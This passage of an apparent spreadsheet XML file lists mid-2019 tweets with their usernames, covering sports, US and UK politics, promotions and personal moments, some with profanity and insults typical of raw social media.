    <t>then after that all i feel is guilt and hopelessness and embarassment.being young and finding balance is hard but i know if i don't try again now it'll only get harder to do later.P.S. don't judge me if i tweet this same type shit again in a few months at least i'd b trying again</t>
  </si>
  <si>
    <t>ListAdvicer</t>
  </si>
  <si>
    <t>Jade Dynasty Top List, Jade Dynasty Private Servers https://t.co/59TxCtBitU Jade Dynasty Online top 100 list. Jade Dynasty Private servers, free servers. Add your Jade Dynasty server for free to get more players. Jade Dynasty Online private servers top 100</t>
  </si>
  <si>
    <t>-Gif starter for @ChaoticPea - https://t.co/9PdnKfvCQj</t>
  </si>
  <si>
    <t>golfpol0</t>
  </si>
  <si>
    <t>That Middle of the Fairway Feeling 🎯💰 https://t.co/XmHGmiuY6L FAST AND FREE 🚚 https://t.co/SKluVbyyKr #Golf #PGA @kingpin942 https://t.co/uCD8OxK4tq</t>
  </si>
  <si>
    <t>RadicalTanuki</t>
  </si>
  <si>
    <t>If I'm ever giggling to myself in the bathroom it's probably because of our faucet https://t.co/Rq3uC8slRo</t>
  </si>
  <si>
    <t>GrushNYC</t>
  </si>
  <si>
    <t>@Jomboy_ Chad/Nestor would be our #2 starter if the playoffs started right now. Just think about that. Team badly needs quality starting pitching.</t>
  </si>
  <si>
    <t>Kaseem1026</t>
  </si>
  <si>
    <t>@DoNotAtMe_ Where do u place him all time what number ? On the WR list</t>
  </si>
  <si>
    <t>DrRJKavanagh</t>
  </si>
  <si>
    <t>@SusanRLane @amazingprizzini @radleybalko @CNN This is a ridiculous statement. But it actually supports their faces not being blurred. First amendment and all that.</t>
  </si>
  <si>
    <t>JJBurnsCompany</t>
  </si>
  <si>
    <t>Once you’ve figured out the who, what, where and when of your retirement plan, it’s time to get to the how. Your financial planner can help: https://t.co/3rvI3e7wdC #RetirementPlanning #GoldenYears #JJBurnsCompany https://t.co/28EcSH8zHH</t>
  </si>
  <si>
    <t>spoopycalum</t>
  </si>
  <si>
    <t>i actually have plans for this weekend, im thriving</t>
  </si>
  <si>
    <t>KestrelArts</t>
  </si>
  <si>
    <t>@ReElectCummings When Obama made much the same criticisms, was it racism and hate then, too?</t>
  </si>
  <si>
    <t>seeley_nigel</t>
  </si>
  <si>
    <t>@Deanoandrews @MissAEMarshall Congratulations to you and the family.</t>
  </si>
  <si>
    <t>maple_java</t>
  </si>
  <si>
    <t>@illythekitty what the hell</t>
  </si>
  <si>
    <t>JoeCostin</t>
  </si>
  <si>
    <t>@ESPNNBA Dwyane Wade definitely told AD how to take advantage of GarPax</t>
  </si>
  <si>
    <t>RGamer19</t>
  </si>
  <si>
    <t>@KaijuCerberus Nope. And as usual my favorite character got screwed over again because for some reason Shadow can just never be taken seriously.</t>
  </si>
  <si>
    <t>nishaaa08</t>
  </si>
  <si>
    <t>When you in the back hiding at your job cause you wanna use your phone 😂😂 fuck you pizza head bitches</t>
  </si>
  <si>
    <t>Nys444</t>
  </si>
  <si>
    <t>My life is honestly amazing &amp; I have ABSOLUTELY NO reason to be upset but I am because I don’t have control over my emotions anymore.</t>
  </si>
  <si>
    <t>jklillp</t>
  </si>
  <si>
    <t>@BetteMidler @thenewyorker Look how short her skirt is, she was asking for it! #BelieveSurvivors #TrueColors</t>
  </si>
  <si>
    <t>DisgruntldGamer</t>
  </si>
  <si>
    <t>Replaying Longshot to get a trophy I missed on my first play through. Last trophy I need for my Madden 19 platinum 👀</t>
  </si>
  <si>
    <t>Nacres_LiveData</t>
  </si>
  <si>
    <t>[Nacres WeatherBot-July 23, 2019 at 01:00AM]: Temp:68℉, Hum:79%, Wind:7MPH from the North. Clear.</t>
  </si>
  <si>
    <t>gbpressgazette</t>
  </si>
  <si>
    <t>Training camp begins Thursday, which means a lot of visitors coming to Green Bay during the next month looking for things to do. They won't be disappointed. https://t.co/ILDJJZ35uA</t>
  </si>
  <si>
    <t>ApriKelly</t>
  </si>
  <si>
    <t>@realDonaldTrump @ThomasHomanICE @SteveHiltonx They don't want to secure the border</t>
  </si>
  <si>
    <t>HovLane__</t>
  </si>
  <si>
    <t>@richsayso Zanie and a fool* 💀💀💀💀💀 https://t.co/iI7yhQ2MhQ</t>
  </si>
  <si>
    <t>@annieklatt Thank you and the same to you, Annie!😊😎</t>
  </si>
  <si>
    <t>AgentTinsley</t>
  </si>
  <si>
    <t>YoU wAKe uP aNd dOnT kNOw WhERe U r https://t.co/17CiKZuw9g</t>
  </si>
  <si>
    <t>baglady618</t>
  </si>
  <si>
    <t>@one_spoken He’s proven himself over and over again that he is unfit to serve this country, he should’ve never been a POTUS!! Just when you think he can’t possibly go lower.... then next hour he does something even more ridiculous and say something batshit crazy!!! https://t.co/oQF49FTUhK</t>
  </si>
  <si>
    <t>ThatRoseTattoo</t>
  </si>
  <si>
    <t>Glad to see Jake Atlas having a better day today! #BegForMercy (big 'Fuck The Circus' chant) https://t.co/wNRDBea21L</t>
  </si>
  <si>
    <t>ecoopersmith</t>
  </si>
  <si>
    <t>Currently writing a song called "This Chili's Ain't Big Enough For The Two Of Us"</t>
  </si>
  <si>
    <t>mollymjebber</t>
  </si>
  <si>
    <t>Join this club to win a copy of ELLIE'S REDEMPTION and more books in the future! https://t.co/TIOxUG4q9h https://t.co/DIyGzrw3wo</t>
  </si>
  <si>
    <t>softballmom2012</t>
  </si>
  <si>
    <t>@monicaonairtalk @TheJuanWilliams He is the biggest race divider there is. Smdh 😠</t>
  </si>
  <si>
    <t>BrianB64978376</t>
  </si>
  <si>
    <t>@MarkWarner Then why didn't you and your buddy Obama fix it when it was ALL happening on your watch?!? Can't wait to see the forthcoming indictments...maybe your name will be on one!</t>
  </si>
  <si>
    <t>starpubsandbars</t>
  </si>
  <si>
    <t>Thanks @JohnStevensonMP for coming to visit the St Nicholas Arms in Carlisle, which recently re-opened after a £180,000 refurbishment. Fantastic to see it trading again after an 18 month closure. Cheers! 🍻 Read more 👉 https://t.co/uTwncx3pin https://t.co/gd1NnZOMd6</t>
  </si>
  <si>
    <t>dellspalace</t>
  </si>
  <si>
    <t>TONIGHT- THUNDERSTRUCK TAKES THE STAGE! Tickets are limited! Striving to stay true to the AC/DC way, Thunderstruck WILL bring the power and entertainment of a genuine AC/DC show. #dellspalace #concertseries #baraboo #summerfun #widells https://t.co/ym8vN6OqXi</t>
  </si>
  <si>
    <t>FrostyPastor</t>
  </si>
  <si>
    <t>@ynwamatt Not the only one. Yet I keep hearing how I MUST watch it all.</t>
  </si>
  <si>
    <t>Garysonfire</t>
  </si>
  <si>
    <t>@KezRandle @LMCChelsea @Chris01044 @CarrizabalagaFC He’s an absolute reptile. He blocked me for calling him out for his xenophobic comments about foreign supporters. He’s a massive hypocrite</t>
  </si>
  <si>
    <t>Suger_23</t>
  </si>
  <si>
    <t>Nope. We’re not fans of strangerthingstv 💁🏽‍♀️. Bye, how fab does Lena look in her #StrangerThings t with the ElevenadeFreeze ? #baskinrobbins #icecream #fanlove #lenaandleila #shipsahoy #steveharrington… https://t.co/US9et5jpub</t>
  </si>
  <si>
    <t>09samiam</t>
  </si>
  <si>
    <t>@RepMattGaetz How about you stop the divisive rhetoric and actually do some work to unite the country and do something about election interference.</t>
  </si>
  <si>
    <t>Drshillingford</t>
  </si>
  <si>
    <t>Just a reminder that walking is one of the best exercises for you! https://t.co/MttUnUFUh5</t>
  </si>
  <si>
    <t>nashelovato</t>
  </si>
  <si>
    <t>@lesbianxlovato i clicked to see mine and it wasn’t there https://t.co/CQEAM8BEhj</t>
  </si>
  <si>
    <t>stratton2_j</t>
  </si>
  <si>
    <t>@SarahHuckabee @realDonaldTrump Thought you were giving up the drugs and alcohol....😵🤪🤡</t>
  </si>
  <si>
    <t>charlesapple</t>
  </si>
  <si>
    <t>Both the pilot and co-pilot would be found guilty of neglect and sentenced to prison. https://t.co/9o51qVmw4p</t>
  </si>
  <si>
    <t>giluvv</t>
  </si>
  <si>
    <t>At the end of the day this is just a FREE app.</t>
  </si>
  <si>
    <t>RealSaavedra</t>
  </si>
  <si>
    <t>MSNBC’s Jeremy Bash complains Special Counsel Robert Mueller “sucked the life out” of the Russia report and seriously “set back” efforts to impeach Trump Bash says Mueller was "evasive," "lost at times," "very ineffective defense of his own work" https://t.co/uZ3tz6Mqtt</t>
  </si>
  <si>
    <t>ripbigkat</t>
  </si>
  <si>
    <t>Push up with that paper talk💰</t>
  </si>
  <si>
    <t>bai25wil</t>
  </si>
  <si>
    <t>@MARCUSMCFLY @6Cold6World6 @MrPhillyG Right!!! No taste if that’s where you decide to eat 😂</t>
  </si>
  <si>
    <t>AriStot40120268</t>
  </si>
  <si>
    <t>@ZionistGirl18 You can’t call out Islam in the USA. The progressives will call you racist. Yet they call out president oppressive.</t>
  </si>
  <si>
    <t>bakingswifts</t>
  </si>
  <si>
    <t>Swifties be like: Tumblr is violating my first amendment right to get Taylor to see my selfie of my haircut</t>
  </si>
  <si>
    <t>kavit1985</t>
  </si>
  <si>
    <t>@Irumf @DebarshiDeka @EdwardGLuce No talk to Pakistan till they end terrorism. We have tried enough in past 70 years. Also, no 3rd party intervention is acceptable.</t>
  </si>
  <si>
    <t>__youhateme</t>
  </si>
  <si>
    <t>Free Kodak he really ain’t tryin to punch Miami , he just want some attention 😢</t>
  </si>
  <si>
    <t>billyeudy</t>
  </si>
  <si>
    <t>@Imamofpeace Looks like Cousin It from the Adams Family</t>
  </si>
  <si>
    <t>janicebonsu</t>
  </si>
  <si>
    <t>@BaffoaBaffoe Praying for you!!</t>
  </si>
  <si>
    <t>DAG_Investments</t>
  </si>
  <si>
    <t>I never expected $SMG to double this fast. Maybe we don't need any other #CannabisStocks/#MarijuanaStocks (other than $CWEB via $CWBHF, of course). $SMG is lower risk than all of them, it pays dividends, and it is consistently outperforming most of them.</t>
  </si>
  <si>
    <t>itseldaboo</t>
  </si>
  <si>
    <t>My heart goes out to you ❤️</t>
  </si>
  <si>
    <t>texmed</t>
  </si>
  <si>
    <t>The latest Doctors in the House (And Senate)! https://t.co/dPaiYnZOyk</t>
  </si>
  <si>
    <t>amira_j_m</t>
  </si>
  <si>
    <t>i miss @JoseAcos7a , @savsandoval7 and @navarretejas 🥺</t>
  </si>
  <si>
    <t>ktlmao</t>
  </si>
  <si>
    <t>hollie loves paw patrol and i hate all kid shows so it’s great being a mom</t>
  </si>
  <si>
    <t>TheHariLondon</t>
  </si>
  <si>
    <t>Strawberries and chocolate for two! 🛎️ Thank you to our thoughtful Guest Relations Team! #TheHari https://t.co/5BbGc2Igm0</t>
  </si>
  <si>
    <t>MikasOldMan</t>
  </si>
  <si>
    <t>#loveisland "there's easier ways to get 50 grand" . . Oh do enlighten us please.</t>
  </si>
  <si>
    <t>FEightStatus</t>
  </si>
  <si>
    <t>Scheduled (Jul 25, 2019, 18:00 PDT): The Figure Eight platform will be undergoing maintenance during this time and will be unavailable. https://t.co/X6N5CKENHQ</t>
  </si>
  <si>
    <t>AmbroseSin97</t>
  </si>
  <si>
    <t>@Deestroying And yet the argos keeping you on the practice roster they sure need speed, makes me wonder whos faster you are Brandon Banks(Speedy B)</t>
  </si>
  <si>
    <t>canuckmichelle</t>
  </si>
  <si>
    <t>@MissSherrie Thank you..she was only part of our lives for 7 years..but it feels like a lifetime</t>
  </si>
  <si>
    <t>Acg_1012</t>
  </si>
  <si>
    <t>I can’t tell you how many times I’ve watched The Dirt on Netflix</t>
  </si>
  <si>
    <t>HPOAlliance</t>
  </si>
  <si>
    <t>Executives behaving badly? What HR can do to encourage more ethical leadership https://t.co/DqsE7qPmMW @insidehreditor</t>
  </si>
  <si>
    <t>TaraHamiltonH</t>
  </si>
  <si>
    <t>@SavvyAssistantA Hi Angela, I’m excited to share my SASS Course with you. Its just launched and its for midlife women who believe their best years are in front of them and want MORE from their life. Know anyone. Please share with them? https://t.co/ZCnsPFQd56</t>
  </si>
  <si>
    <t>tha_juice24</t>
  </si>
  <si>
    <t>@yomommasugababy @JustRyCole of course cause u gonna be bias about it like shannon said let your son do his thing stop tryna use this platform to show off your ability when u get to do that 82 nights in the nba sam like damn bro</t>
  </si>
  <si>
    <t>ApsisInc</t>
  </si>
  <si>
    <t>@stanleywaite1 @NeurozoInnovat1 @kashthefuturist @DrJDrooghaag @NexWebSites @stanleychen0402 @avrohomg @AmandaRay02 @loveGoldenHeart @realColinMac @Fabriziobustama @enricomolinari Regulations kill the fair market, work in favor of big players and help create monopolies. The clowns regulated banking &amp; stock market a few years prior to the 2008 banking collapse and how did that work out? Government is a giant mechanism operated by pygmies.</t>
  </si>
  <si>
    <t>antDaknee_</t>
  </si>
  <si>
    <t>@pharaoh_moniz @Dr_Kovac14 Save it for the judge chump</t>
  </si>
  <si>
    <t>xEllaBella90</t>
  </si>
  <si>
    <t>@SCTP1212 @sophieewhitee1 But the difference is he literally just asked anna to be his girlfriend</t>
  </si>
  <si>
    <t>hippiehipsta</t>
  </si>
  <si>
    <t>Fruit loops and Bob’s burgers to end my night.</t>
  </si>
  <si>
    <t>NewlookBeryl</t>
  </si>
  <si>
    <t>@Carlinponty @EmbarrassedBrit @abcpoppins Errr before u get carried away boasting U do know that Brussels will See this It doesn’t help our country WE are not proud of u U are embarassing and a stinky shame for us Pooh! It’s Carl 💩 hold ur noses!</t>
  </si>
  <si>
    <t>DavidDSimons</t>
  </si>
  <si>
    <t>"Every day is soil and the work is the seed. Plant the seed and the harvest will follow!"- David D. Simons https://t.co/QLSeO3JrJi</t>
  </si>
  <si>
    <t>STB_KARL_MALONE</t>
  </si>
  <si>
    <t>@TheKompetitor Stick to videos that won’t get blocked on YouTube then. Everyone’s playing by the same rules, those who take advantage of what’s available will succeed</t>
  </si>
  <si>
    <t>Umpire20</t>
  </si>
  <si>
    <t>Ohio woman sentenced to 10 days in jail for feeding stray cats https://t.co/Kt86wUkaTM #GarfieldHeights is tough on crime! How many animals at the #CatFeeding?</t>
  </si>
  <si>
    <t>thelastitgirl</t>
  </si>
  <si>
    <t>when a cancer rising finds out they’re shy and they always have been and they didn’t know</t>
  </si>
  <si>
    <t>TheWilyBandita</t>
  </si>
  <si>
    <t>Tw food Home again and my sweet wife got us lunch from out! She's too good to me! https://t.co/XAoNHKA9JW</t>
  </si>
  <si>
    <t>volpinprops</t>
  </si>
  <si>
    <t>#createx paints - my personal favorite water based paint. Their intercoat clear changed the way I weather my props for life! An excellent alternative to solvent paints on smaller scale pieces as well https://t.co/LVHwoNiv8g</t>
  </si>
  <si>
    <t>gingin615</t>
  </si>
  <si>
    <t>LIVE NOW!! The Dust and the Roar by Cat Porter! + My Review https://t.co/VmfrDmoycK https://t.co/f3Gwh4y12V</t>
  </si>
  <si>
    <t>SCSam4Trump</t>
  </si>
  <si>
    <t>@AOC Why so nasty? I don't think they were being demeaning at all. The host is right. I waited tables making $2.13 an hour plus tips. I made more than the manager and much more than $15 an hour. Raising to $15 would lower my wages and put more strain on the restaurant. Lose, lose.</t>
  </si>
  <si>
    <t>_honeyJv</t>
  </si>
  <si>
    <t>@_SumthinElse That was you !!????? Lmfaooo to this day I don’t remember who tf helped me down the stairs 😭😭</t>
  </si>
  <si>
    <t>JusticeWay007</t>
  </si>
  <si>
    <t>This one goes out to clown car https://t.co/G3jyLCIFka</t>
  </si>
  <si>
    <t>grenadaspot</t>
  </si>
  <si>
    <t>Oh Grenada "Find delicate corals and tropical fish in great abundance along its rich coral reefs that encompass the small nation. Despite its sheer size, it is rich with vibrant festivals, exciting dive sites and… https://t.co/LCKeg2aj6p</t>
  </si>
  <si>
    <t>Bassdropkeys</t>
  </si>
  <si>
    <t>Come through and sesh with me</t>
  </si>
  <si>
    <t>nayak4sure</t>
  </si>
  <si>
    <t>Revelation 1:8 8. "I am the Alpha and the Omega," says the Lord God, "who is and who was and who is to come, the Almighty."</t>
  </si>
  <si>
    <t>khurasankhan123</t>
  </si>
  <si>
    <t>#UnfollowHamidMir Hamid mir criticized the government or Pakistan's powerful security establishment, which is supportive of Imran Khan's administration. https://t.co/c4eFtwVg8o</t>
  </si>
  <si>
    <t>lauublas</t>
  </si>
  <si>
    <t>@CashApp $OleRzzleDzzle #supercashappfriday PLEASE I HVE $5 NEXT WEEK AND I MOVE OUT WEDNESDAY LOL fuck</t>
  </si>
  <si>
    <t>Monsterbait</t>
  </si>
  <si>
    <t>@thepupwinston Oh shoulder stuff! These are great, but hard. Don't use too much weight. You can do sitting dumbell lifts similarly. Just be careful with dumbells, form needs to be just right. You could also get on the Smith machine and sit under the bar and do the same lift.</t>
  </si>
  <si>
    <t>NewsJunkie60</t>
  </si>
  <si>
    <t>@kylegriffin1 Where is he getting the money from?</t>
  </si>
  <si>
    <t>HorshamGardener</t>
  </si>
  <si>
    <t>this is why WSCC has no money to run services. Top salaries ‘effectively out of control’ at West Sussex County Council https://t.co/PLAh5F2PkQ</t>
  </si>
  <si>
    <t>surprisesandfun</t>
  </si>
  <si>
    <t>#ToyTrains Thomas and Friends Accidents will Happen |Train Crashes for Kids | Thoma... https://t.co/1qxxeT9B5u via @YouTube</t>
  </si>
  <si>
    <t>mauriciothw</t>
  </si>
  <si>
    <t>@therealsimah @johanaarod My sister got that to 😤😂</t>
  </si>
  <si>
    <t>coyslavik</t>
  </si>
  <si>
    <t>Always the uniter. https://t.co/bUbvawql9M</t>
  </si>
  <si>
    <t>Disboysonfire</t>
  </si>
  <si>
    <t>We fall in love with peoples flaws. The perfect person would be impossible to love. 🧘🏾‍♂️💫</t>
  </si>
  <si>
    <t>MartineSansoucy</t>
  </si>
  <si>
    <t>@MsAvaArmstrong This is so very true, and they will learn the most not from what we teach them, but from how we live, act and handle situations in life.</t>
  </si>
  <si>
    <t>JuniorStyleLDN</t>
  </si>
  <si>
    <t>New tumblr post: "Style💫 Image from Urban Vibes editorial, link to view..." https://t.co/Av4AuWpR35 , infantiumvictoria, kidseditorial</t>
  </si>
  <si>
    <t>LeoCrusher</t>
  </si>
  <si>
    <t>@HarryNSkinner @OwenJones84 It's a bit abstract though, who's the replacement and how do they get in place before an October election?</t>
  </si>
  <si>
    <t>LynchOnSports</t>
  </si>
  <si>
    <t>Myself &amp; @AlexanderKLee are LIVE at 11am ET on @theScoreMMA podcast recapping #UFCSanAntonio, previewing #UFC240 and answering your #MMA questions. Post your questions in the Youtube chat link below https://t.co/70w8z0LtVp https://t.co/Cx2S4U4FEy</t>
  </si>
  <si>
    <t>adrikmordan</t>
  </si>
  <si>
    <t>alright boys, so I've been away for a good month and I've been thinking about my "gaming career" and it's clearly not going good at all. so from now on, i will not be playing video games at somewhat of a "pro" level, I'll just play for fun-</t>
  </si>
  <si>
    <t>Lean4Lifetime</t>
  </si>
  <si>
    <t>One way to build your internet business is usually to bring in a lot of daily traffic , https://t.co/w7JHvxKyFJ #Advertising https://t.co/d11RhGJPAu</t>
  </si>
  <si>
    <t>TimothyWatts___</t>
  </si>
  <si>
    <t>"Arizona senator denies as false and libelous, rumors that he has connections with the underworld." 👀</t>
  </si>
  <si>
    <t>studentforce</t>
  </si>
  <si>
    <t>The studentforce Daily is out! https://t.co/0xlpuQQvon Stories via @PhilKomarny @CIOPaige @IdealistConsult #iot #ai</t>
  </si>
  <si>
    <t>MSHoffpauir</t>
  </si>
  <si>
    <t>#DemDebate Not sure where the candidates get that we have choice in health insurance. I get whatever my employer decides to give me. That is not a real choice</t>
  </si>
  <si>
    <t>Cat5weaver</t>
  </si>
  <si>
    <t>@Digbylj In what manner shape or form is the EU forcing the UK out?</t>
  </si>
  <si>
    <t>PeterCraigBate1</t>
  </si>
  <si>
    <t>@PnPCBC @cathmckenna @ezralevant I'm blocked by all things Rebel, so who are they to complain?</t>
  </si>
  <si>
    <t>That_Slow_Subie</t>
  </si>
  <si>
    <t>@CallMeSeanald I wanna know how nobody noticed her😂 for real though people are fucking disgusting and we need another plague.</t>
  </si>
  <si>
    <t>YourselfSnowman</t>
  </si>
  <si>
    <t>@nytimes And that’s not witness tampering?</t>
  </si>
  <si>
    <t>TrueSarahMichel</t>
  </si>
  <si>
    <t>@HighKickHarry1 "Darth Dodger". These nicknames are going to kill me 🤣🤣</t>
  </si>
  <si>
    <t>Rooz739</t>
  </si>
  <si>
    <t>He was told to go back to Africa. Instead, he may go to the U.S. Senate. https://t.co/PQCWRZ80MY by @ryangrim</t>
  </si>
  <si>
    <t>BigDaddyShanti</t>
  </si>
  <si>
    <t>@ashhnichelle and the fact she from chicago makes her even more fine 😩</t>
  </si>
  <si>
    <t>BlastFMRock</t>
  </si>
  <si>
    <t>27-07-2019 01:50:01 https://t.co/QSSPnxvGl1 #BlastFMRock 🔊 Megadeth - Holy Wars...The Punishment Due</t>
  </si>
  <si>
    <t>terrikist</t>
  </si>
  <si>
    <t>Looks like Sharon took some napkins from the coffee house and made a skort #YR</t>
  </si>
  <si>
    <t>thealinemello</t>
  </si>
  <si>
    <t>and her little sister just turned 15. I missed her quinceañera because I was sick and her mom and I saw each other two weeks ago, talked about how she’d been sick too, and how there was something going around. She was doing better. Then I get a text today, and my mentee tells me</t>
  </si>
  <si>
    <t>iDrowzie</t>
  </si>
  <si>
    <t>@playdragonquest the anime good?</t>
  </si>
  <si>
    <t>emcguire39</t>
  </si>
  <si>
    <t>@robbylafont @LSUfootball Exactly the issue..</t>
  </si>
  <si>
    <t>Gamercore</t>
  </si>
  <si>
    <t>@stillgray Gingers are actually the most marginalized race in America. #changemymind</t>
  </si>
  <si>
    <t>vickymward78</t>
  </si>
  <si>
    <t>@FahAunty @marmitemarmz But he has got restrictions the frigging numbnuts 😂</t>
  </si>
  <si>
    <t>EricArthurBlai4</t>
  </si>
  <si>
    <t>@David_6878 @Rich_1337 @Neilccfc @tommog @BrabbenBrett @pabmanjo @1man_plus1dog @ShadowyF Meanwhile back at the point ...</t>
  </si>
  <si>
    <t>dbanksiii</t>
  </si>
  <si>
    <t>@savetheplace @Mike4372Mike @michellemalkin @IlhanMN @SteveDraz According to the U.S. Attorney’s Manual, even a mere attempt to pursue those ends is enough for obstruction, regardless of whether the attempt succeeds. Facts or not?</t>
  </si>
  <si>
    <t>Trend_Left</t>
  </si>
  <si>
    <t>#AOC, #Warren urge Senate for environmentally safer military cleanup in Vieques, #PuertoRico https://t.co/Wxr2EyGuH3</t>
  </si>
  <si>
    <t>EriccaFigueroa</t>
  </si>
  <si>
    <t>“A home is one of the most important assets that most people will ever buy. Homes are also where memories are made and you want to work with someone you can trust.” —Warren Buffett, Chairman and CEO, Berkshire Hathaway Inc</t>
  </si>
  <si>
    <t>hetienzo</t>
  </si>
  <si>
    <t>yooooo toronto peeps i'm tryna be a hot girl this summer but i need places to be one at....... lmk??? 🥺😔🤧 https://t.co/cWlPi5j72F</t>
  </si>
  <si>
    <t>EdmundoMolina6</t>
  </si>
  <si>
    <t>@realDonaldTrump Who’s paying for the wall? Do your followers understand Americans are paying for it and not Mexico like you promised?</t>
  </si>
  <si>
    <t>footiusmaximus</t>
  </si>
  <si>
    <t>@realDonaldTrump Nice throwing American companies under the bus again you fuck stick</t>
  </si>
  <si>
    <t>KaabiiKun</t>
  </si>
  <si>
    <t>It's so hot. I want to take a nap in front of the fan.</t>
  </si>
  <si>
    <t>Scuibs</t>
  </si>
  <si>
    <t>Just got stream sniped for $1.50</t>
  </si>
  <si>
    <t>pamelanextdoor</t>
  </si>
  <si>
    <t>@__michelle64 Girl that is the EXACT same thing. My kids fathers gf is the one that is making him get more disciplined. otherwise my kids would walk all over him esp my daughter. She’s sassy x Infinity. LOL</t>
  </si>
  <si>
    <t>ShadowHogg666</t>
  </si>
  <si>
    <t>@erotic_neko That's our promotion at Dunkin/Baskin Robin's we sell Stranger things ice cream and things like that for the months of June and July</t>
  </si>
  <si>
    <t>revdonna</t>
  </si>
  <si>
    <t>St John Gualbert: Sanctify the Lord Christ in Your Hearts https://t.co/AeVj0h7Sck</t>
  </si>
  <si>
    <t>ElPloddo</t>
  </si>
  <si>
    <t>@marculenta if that's the case i been old since I'm 9</t>
  </si>
  <si>
    <t>alovething</t>
  </si>
  <si>
    <t>ryan (whispering): what should we say to try to get them to come downstairs? shane: HI PLEASE COME DOWNSTAIRS! ryan: what no</t>
  </si>
  <si>
    <t>Saint2710</t>
  </si>
  <si>
    <t>@GodofGVip Couldn't get over 8 again! Went for over 9 no boom 😢</t>
  </si>
  <si>
    <t>pucksherburn</t>
  </si>
  <si>
    <t>@AliceLfc4 Please tell me he's on the RED team.</t>
  </si>
  <si>
    <t>rosecitiesittyy</t>
  </si>
  <si>
    <t>All that for nothin 🤦🏾‍♀️</t>
  </si>
  <si>
    <t>hambleton_jeri</t>
  </si>
  <si>
    <t>@RedBuds @LarryRinehart4 @Hippie_of_Love @philadper2014 @TexanDee @pinkfloyd @Just_pinkfloyd @steve_sps @BRad_4_20 @KrisKiVo @8675309jc @_jena4n @Bklynbby @cbd_earth @dan_chronicles @DollarBlazeClub @Godzmazter @SomersTrevor @QTAnon1 @RandyRRQuaid @BlitzenKC @Cogitatorium @EmeraldZoo @NeilSamra1 @DazeTom The Red Headed Stranger kicked my ass..... I wish he would in person and Ill share one of his own with him... I don't wanna smoke weed with Willie again.... I just wanna smoke with him once... Talk about just way too cool!!! 🤔😂🍀🌬️🤔😂🤣🤣🤣🤣😂🤣</t>
  </si>
  <si>
    <t>RyanGirdusky</t>
  </si>
  <si>
    <t>This is vile, sensationalistic reporting. These defamatory statements must be retracted immediately. One America News Network has no connection to the Russian government or any other government – no connection whatsoever, financial or otherwise. https://t.co/b4MdUDZNjT</t>
  </si>
  <si>
    <t>WoooooTheReds</t>
  </si>
  <si>
    <t>@BigRedTweeter Roark doesn’t have The Will to Win™️?</t>
  </si>
  <si>
    <t>Acronis</t>
  </si>
  <si>
    <t>The rise of Edge computing requires modern enterprises and MSPs to be ready for any scenario. With Acronis Cyber Infrastructure 3.0, that's easier, more efficient and reliable than ever before. https://t.co/YkT5Smz2Qr 🛡️Get #CyberFit with #Acronis | #EdgeComputing https://t.co/Y6itsoNGdR</t>
  </si>
  <si>
    <t>SO TELL ME WHAT IS LEFT FOR ME When I've Given Up Everything https://t.co/ibQooWWVhX</t>
  </si>
  <si>
    <t>Peter_Horton</t>
  </si>
  <si>
    <t>@AngryBlackLady It was literally the first date my wife and I had. We went to a midnight movie, laughed our butts off, then stayed up all night laughing and talking. Big agree.</t>
  </si>
  <si>
    <t>KieArmstrong97</t>
  </si>
  <si>
    <t>@RokerReport @PaddyHollis123 He’s the best CM we’ve got, if fit he needs to play!</t>
  </si>
  <si>
    <t>BlackRepunxel</t>
  </si>
  <si>
    <t>any nigga i ever cut off or did be dirty always try to ease they way back into my life like shit sweet, fuck you. you know i ain’t the bitch to play wit</t>
  </si>
  <si>
    <t>NLPChris</t>
  </si>
  <si>
    <t>@senatemajldr Why does #MoscowMitch the Russian Asset Putin's bitch refuse to allow the Senate to vote on election security legislation?</t>
  </si>
  <si>
    <t>cspanwj</t>
  </si>
  <si>
    <t>Former Justice John Paul Stevens being brought into the Supreme Court for a ceremony and then to lie in repose Watch on C-SPAN2: https://t.co/6fIcaMMlLM https://t.co/jc2oh4QCib</t>
  </si>
  <si>
    <t>Stoakk</t>
  </si>
  <si>
    <t>@AskboutAj_ all about the Grizzind</t>
  </si>
  <si>
    <t>pykwymi4</t>
  </si>
  <si>
    <t>@March_for_Life Can you really be 'pro life' if you're not saving lives of dialysis patients? Hurry: we need a kidney for Dr. Tim in Las Vegas #DontBeAHypocrite #ActuallyProLife</t>
  </si>
  <si>
    <t>taco_bellaa</t>
  </si>
  <si>
    <t>I am 15 minutes into Season 4 episode 1 of Queer Eye and yes I am already crying.</t>
  </si>
  <si>
    <t>GCTitans</t>
  </si>
  <si>
    <t>The DON is good Head to the Match Centre for all the latest news, replays and stats: https://t.co/cTZ991xiPP #NRLTitansBroncos https://t.co/PXCDa5ddYu</t>
  </si>
  <si>
    <t>adriiaannaaf</t>
  </si>
  <si>
    <t>“i only have like 2 brain cells left but you’re the brain cell that like keeps me alive” 🥺😂</t>
  </si>
  <si>
    <t>WWE_MandyRose</t>
  </si>
  <si>
    <t>Thanks to these beauties &amp; everyone at @11miami for making my bday so special! 💞💗💃 🍾#e11even https://t.co/ddWvFZhy8k</t>
  </si>
  <si>
    <t>TeamSerbia1914</t>
  </si>
  <si>
    <t>@CountDankulaTV Being Scottish is literally one of the most memorable parts about you, how do you fuck that up? If he had sais British, that’d make a bit more sense, since British applies more to the entire UK, but I guess not</t>
  </si>
  <si>
    <t>WG_Grapevine</t>
  </si>
  <si>
    <t>@jaystuu I call him Captain Mainwaring (Dads Army). Seems to fit!</t>
  </si>
  <si>
    <t>xBlakeGriffin23</t>
  </si>
  <si>
    <t>@LAClippers y’all gonna hook me up with a pair of tickets to the preseason game in Vancouver? 😊😊😊😊😊</t>
  </si>
  <si>
    <t>AureHope</t>
  </si>
  <si>
    <t>Iran rejects UK's proposal for EU-led maritime force Critics point to irony of UK calling on EU support while heading for Brexit (apparently someone forgot to tell UK they want out of the EU) 🙄 https://t.co/3XblPDsCRE</t>
  </si>
  <si>
    <t>lMAGINEHERRON</t>
  </si>
  <si>
    <t>@Love19Jack you’re welcome and ilyt</t>
  </si>
  <si>
    <t>WilleMH00</t>
  </si>
  <si>
    <t>Heading out of the country next week. I had a dream I got to the airport and forgot my passport.</t>
  </si>
  <si>
    <t>Incognito1729</t>
  </si>
  <si>
    <t>@SpeakerPelosi @RepCummings We are one race-the human race...Racism is a weak argument. AD HOMINEM.</t>
  </si>
  <si>
    <t>@TherealChamp22 Which team was the first to leave the ‘Nanaimo Bar Drop’ challenge in their 2019 Chevrolet Camaro SS? #AmazingRaceCanada #TheChevroletRace Reply #stop to unsubscribe.</t>
  </si>
  <si>
    <t>gofermom</t>
  </si>
  <si>
    <t>@thehill Neither is Tulsi Gabbard. Kamala Harris is overqualified compared to Tulsi’s experience.</t>
  </si>
  <si>
